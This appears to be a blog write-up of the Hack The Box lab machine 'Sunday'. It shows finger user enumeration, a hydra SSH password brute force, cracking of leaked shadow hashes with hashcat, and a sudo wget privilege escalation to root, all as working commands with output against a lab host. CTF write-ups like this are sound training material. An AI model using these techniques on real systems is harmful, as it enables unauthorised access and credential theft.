thumbnail
Hack The Box Sunday
hackthebox / pentest / ENG
2024.08.12.

1. Machine Info

Sunday is an easy-rated, retired machine from Hack the Box. Well, I really didn’t like this one since it was mainly about guessing or bruteforcing the credentials, including hash-cracking.

sunday

But it was still a good machine to repeat some basic stuffs which we don’t always have in our mind.

As always, let’s dive into the machine!

2. Recon

Starting with nmap scan:

┌──(hosan㉿kali)-[~/oscp/htb-box/sunday]
└─$ sudo nmap 10.10.10.76 -Pn -sC -sV                                
[sudo] password for hosan: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 03:45 EDT
Stats: 0:02:00 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 03:48 (0:00:45 remaining)
Nmap scan report for 10.10.10.76
Host is up (0.19s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE VERSION
79/tcp  open  finger?
|_finger: No one logged on\x0D
| fingerprint-strings: 
|   GenericLines: 
|     No one logged on
|   GetRequest: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|   HTTPOptions: 
|     Login Name TTY Idle When Where
|     HTTP/1.0 ???
|     OPTIONS ???
|   Help: 
|     Login Name TTY Idle When Where
|     HELP ???
|   RTSPRequest: 
|     Login Name TTY Idle When Where
|     OPTIONS ???
|     RTSP/1.0 ???
|   SSLSessionReq, TerminalServerCookie: 
|_    Login Name TTY Idle When Where
111/tcp open  rpcbind 2-4 (RPC #100000)
515/tcp open  printer

There is a service named “finger” on port 79. After a quick search:

The Finger program/service is utilized for retrieving details about computer users. Typically, the information provided includes the user’s login name, full name, and, in some cases, additional details.

I can’t justify why someone would use this kind of service, but whatever.

3. Enumeration

Let’s start with a basic interaction

┌──(hosan㉿kali)-[~/oscp/htb-box/sunday]
└─$ echo "root" | nc -vn 10.10.10.76 79
(UNKNOWN) [10.10.10.76] 79 (finger) open
Login       Name               TTY         Idle    When    Where
root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46

So it indeed shows us username.

Let’s try user enumeration from PentestMonkey.

──(hosan㉿kali)-[~/oscp/htb-box/sunday/finger-user-enum-1.0]
└─$ perl finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 10.10.10.76 -p 79
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

root@10.10.10.76: root     Super-User            ssh          <Dec  7, 2023> 10.10.14.46         ..
sammy@10.10.10.76: sammy           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..
sunny@10.10.10.76: sunny           ???            ssh          <Apr 13, 2022> 10.10.14.13         ..

So we’ve got three user: root, sammy, sunny. Pretty obviously, root is (for now) out of scope.

4. Initial Foothold

Hmm, but I can’t find any remote connection services. Let’s try nmap once more with -p-

Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE   REASON
79/tcp    open  finger    syn-ack ttl 59
111/tcp   open  rpcbind   syn-ack ttl 63
515/tcp   open  printer   syn-ack ttl 59
6787/tcp  open  smc-admin syn-ack ttl 59
22022/tcp open  unknown   syn-ack ttl 63

Oh, so there was a ssh service running on port 22022!

But here was a tricky part: we had to guess the password of our user. It happens if we look at some really old machines from HTB. I tried with days.txt since our user and machine’s name is sunday.

┌──(hosan㉿kali)-[~/oscp/htb-box/sunday]
└─$ hydra -L users.txt -P /usr/share/wordlists/seclists/Passwords/days.txt ssh://10.10.10.76:22022  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-08-18 05:05:17
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 12480 login tries (l:2/p:6240), ~780 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[STATUS] 166.00 tries/min, 166 tries in 00:01h, 12315 to do in 01:15h, 15 active
[STATUS] 155.33 tries/min, 466 tries in 00:03h, 12015 to do in 01:18h, 15 active
[STATUS] 141.57 tries/min, 991 tries in 00:07h, 11490 to do in 01:22h, 15 active
[STATUS] 136.07 tries/min, 2041 tries in 00:15h, 10440 to do in 01:17h, 15 active
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday

so as a result, we’ve got sunny:sunday.

┌──(hosan㉿kali)-[~]
└─$ ssh sunny@10.10.10.76 -p 22022                                              
(sunny@10.10.10.76) Password: 
Last login: Wed Apr 13 15:35:50 2022 from 10.10.14.13
Oracle Solaris 11.4.42.111.0                  Assembled December 2021
sunny@sunday:~$

Got it. But it is truly no fun to brute force or guess some random passwords.

5. Shell as sammy & root

I couldn’t open user.txt. So let’s try privesc.

After playing around for a while, I found this:

sunny@sunday:/backup$ cat agent22.backup 
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

So we have this password hash, and I really hate it. And don’t forget, that :6445.. at the end is not relevant.

┌──(hosan㉿kali)-[~/oscp/htb-box/sunday]
└─$ hashcat hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
hashcat (v6.2.6) starting in autodetect mode
(used autodetection)


┌──(hosan㉿kali)-[~/oscp/htb-box/sunday]
└─$ cat cracked.txt 
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

So I logged in as sammy. sudo -l shows us:

-bash-5.1$ sudo -l
User sammy may run the following commands on sunday:
    (ALL) ALL
    (root) NOPASSWD: /usr/bin/wget

Looking at GTFObins:

-bash-5.1$ TF=$(mktemp)
-bash-5.1$ chmod +x $TF
-bash-5.1$ echo -e '#!/bin/sh\n/bin/sh 1>&0' >$TF
-bash-5.1$ sudo wget --use-askpass=$TF 0
root@sunday:/home/sammy#

So I got root. That’s it!

6. Review

Nah, I really didn’t like this one. I tried to find a more “logical” way to get into the machine, but at the end, it was just brute-forcing…

7. Source

  • HTB 2024
  • Me!